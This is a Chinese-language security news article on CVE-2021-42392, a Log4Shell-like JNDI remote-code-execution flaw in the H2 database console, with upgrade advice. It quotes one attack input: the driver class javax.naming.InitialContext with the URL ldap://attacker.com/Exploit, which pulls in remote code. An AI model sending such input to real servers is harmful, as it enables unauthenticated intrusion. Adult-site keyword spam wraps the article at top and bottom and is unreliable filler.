成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

警告!與Log4Shell相似的Java漏洞出現(xiàn)了

安全
安全研究人員警告稱,一個最新的嚴(yán)重的Java錯誤,其本質(zhì)與目前在全球范圍內(nèi)利用的臭名昭著的 Log4Shell 漏洞相同 。

安全研究人員警告稱,一個最新的嚴(yán)重的Java錯誤,其本質(zhì)與目前在全球范圍內(nèi)利用的臭名昭著的 Log4Shell 漏洞相同 。

CVE-2021-42392 尚未在國家漏洞數(shù)據(jù)庫 (NVD) 中正式發(fā)布,但據(jù)軟件企業(yè)內(nèi)JFrog 稱,它影響了流行的H2 Java SQL 數(shù)據(jù)庫的控制臺。

這家安全公司提醒,任何目前運行的暴露于其 LAN 或 WAN 的 H2 控制臺的組織立即將數(shù)據(jù)庫更新到 2.0.206 版本,否則攻擊者可能會利用它進行未經(jīng)身份驗證的遠程代碼執(zhí)行 (RCE)。

與 Log4Shell 一樣,該錯誤與 JNDI(Java 命名和目錄接口)“遠程類加載”有關(guān)。JNDI 是一種為 Java 應(yīng)用程序提供命名和目錄功能的 API。這意味著如果攻擊者可以將惡意 URL 獲取到 JNDI 查找中,它就可以啟用 RCE。

“簡而言之,根本原因類似于 Log4Shell——H2 數(shù)據(jù)庫框架中的多個代碼路徑將未經(jīng)過濾的攻擊者控制的 URL 傳遞給 javax.naming.Context.lookup 函數(shù),該函數(shù)允許遠程代碼庫加載(AKA Java 代碼注入 AKA遠程代碼執(zhí)行),” JFrog 解釋道。

“具體來說,org.h2.util.JdbcUtils.getConnection 方法以驅(qū)動類名和數(shù)據(jù)庫 URL 作為參數(shù)。如果驅(qū)動程序的類可分配給 javax.naming.Context 類,則該方法會從中實例化一個對象并調(diào)用其查找方法。”

提供諸如“javax.naming.InitialContext”之類的驅(qū)動程序類和像 ldap://attacker.com/Exploit 這樣簡單的 URL 將導(dǎo)致遠程代碼執(zhí)行。

JFrog 表示,該漏洞特別危險,因為 H2 數(shù)據(jù)庫包特別受歡迎。該公司聲稱,它是前 50 個最受歡迎的 Maven 軟件包之一,擁有近 7000 個工件依賴項。

但是,有一些原因?qū)е吕貌粫?Log4Shell 那樣廣泛。一方面,它具有“直接影響范圍”,這意味著易受攻擊的服務(wù)器應(yīng)該更容易找到。其次,在大多數(shù) H2 發(fā)行版中,控制臺只監(jiān)聽 localhost 連接,這意味著默認設(shè)置是不可利用的。

“許多供應(yīng)商可能正在運行 H2 數(shù)據(jù)庫,但沒有運行 H2 控制臺,雖然除了控制臺之外還有其他向量可以利用這個問題,但這些其他向量是依賴于上下文的,不太可能暴露給遠程攻擊者。”JFrog 補充道。

 

責(zé)任編輯:趙寧寧 來源: 新浪科技
相關(guān)推薦

2022-01-07 10:02:31

Log4j漏洞網(wǎng)絡(luò)攻擊網(wǎng)絡(luò)安全

2021-12-26 00:01:51

Log4Shell漏洞服務(wù)器

2021-12-15 06:21:29

Log4Shell漏洞網(wǎng)絡(luò)攻擊

2022-01-06 11:55:02

Aquatic PanLog4Shell漏洞

2021-12-17 09:50:21

Log4Shell漏洞勒索軟件

2022-01-14 19:12:07

勒索軟件攻擊漏洞

2022-01-28 12:07:29

Log4j漏洞網(wǎng)絡(luò)攻擊

2021-12-14 16:07:04

Log4Shell漏洞黑客

2021-12-14 09:23:40

黑客漏洞網(wǎng)絡(luò)攻擊

2021-12-22 09:54:48

黑客Log4Shell漏洞攻擊

2024-05-15 16:10:15

2022-03-03 09:51:12

Log4j 漏洞網(wǎng)絡(luò)安全

2021-12-23 09:47:36

Log4jRCE漏洞DoS漏洞

2022-04-27 11:51:20

CISALog4Shell漏洞

2021-12-15 18:32:33

Log4Shell漏洞攻擊

2021-12-16 09:44:22

勒索軟件漏洞 Log4Shell

2021-12-12 09:23:44

零日漏洞網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2021-12-21 06:14:10

漏洞勒索軟件攻擊

2022-01-06 09:52:39

Log4j漏洞攻擊

2021-12-22 13:52:40

Log4j漏洞谷歌
點贊
收藏

51CTO技術(shù)棧公眾號

主站蜘蛛池模板: 欧美极品在线观看 | 精品国产乱码久久久久久中文 | 亚洲国产aⅴ成人精品无吗 综合国产在线 | 男女羞羞视频免费看 | 国产精品高清在线 | 在线免费观看毛片 | 久草免费在线视频 | 精品国产成人 | 欧美日韩在线视频一区 | 国产黄色av电影 | 亚洲电影免费 | 在线观看成人免费视频 | 伊人精品一区二区三区 | 亚洲天堂日韩精品 | 精品美女视频在线观看免费软件 | 国产在线a视频 | 欧美成人h版在线观看 | 麻豆毛片 | 亚洲精品自在在线观看 | 激情国产| 麻豆av网站 | 国产高清美女一级a毛片久久w | 鲁一鲁资源影视 | aaa国产大片 | 国产精品久久久久久久久久久久午夜片 | 欧美黄色一区 | 伊人色综合久久久天天蜜桃 | 婷婷久久精品一区二区 | 小草久久久久久久久爱六 | av香蕉| 涩涩操| 国产成人一区二区三区精 | av男人的天堂在线 | 久久只有精品 | 国产欧美精品一区二区色综合朱莉 | 中文一区 | www.玖玖玖 | 国产高清一区二区三区 | 久久久久国产一区二区三区四区 | 日本不卡一区 | 国产精品美女久久久久久不卡 |